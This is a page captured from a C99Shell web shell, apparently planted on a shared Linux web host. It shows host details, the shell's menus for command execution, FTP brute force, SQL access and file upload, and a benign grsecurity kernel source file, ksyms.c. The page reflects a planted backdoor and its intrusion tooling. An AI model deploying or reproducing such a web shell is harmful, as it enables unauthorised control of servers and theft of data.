!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/src/linux-headers-6.6.104-grsec-jammy+/scripts/gcc-plugins/   drwxr-xr-x
Free 674.82 GB of 879.6 GB (76.72%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ksyms.c (1.68 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*
 * Kernel constants to make available for plugins without the need to include
 * kernel headers.
 *
 * There's overlap with asm-offsets.h, but we want type preserving symbols, not
 * defines to have proper compiler visibility and be able to use them in
 * plugins.
 *
 * This file's preprocessor output will be post-processed to generate "ksyms.h"
 *
 * Written by Mathias Krause <[email protected]>
 * Copyright 2020 by Open Source Security, Inc.
 * Copyright 2020-2024 by PaX Team
 * Licensed under the GPL v2
 */

#define KSYMS_GENERATE_INCLUDES
#include "ksyms.def"

/* Dummy struct to be able to preserve the original types */
static const struct __plugin_ksyms {
    /* These symbols will be generated as struct fields 'typeof(val) sym;' */
#define DEFINE(sym, val) typeof(val) ksym_##sym;
#define DEFINE_OPTIONAL(sym, val) koptional_##sym
#define DEFINE_ENUM(name, val) enum ksym_##name ksym_##val;
#define DEFINE_DECL(sym, val) typeof(val) *ksym_##sym;
#define DEFINE_DECL_OPTIONAL(def, sym, val) kdecloptional(def_##def, sym_##sym)
#define DEFINE_TYPE(name, val) struct val ksym_##val;
#define COMMENT(s) COMMENT(s)
#define BLANK() BLANK()
#define KSYMS_GENERATE_DEFINES
#include "ksyms.def"
} __plugin_ksyms __maybe_unused = {
    /* These symbols will be generated as designated initializers '.sym = val,' */
#define DEFINE(sym, val) .ksym_##sym = val,
#define DEFINE_OPTIONAL(sym, val) kinit_##val
#define DEFINE_ENUM(name, val)
#define DEFINE_DECL(sym, val) .ksym_##sym = &val,
#define DEFINE_DECL_OPTIONAL(def, sym, val) kdeclinit(def_##def, sym_##sym, val_##val)
#define DEFINE_TYPE(name, val)
#define COMMENT(s) COMMENT(s)
#define BLANK() BLANK()
#define KSYMS_GENERATE_DEFINES
#include "ksyms.def"
};

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0189 ]--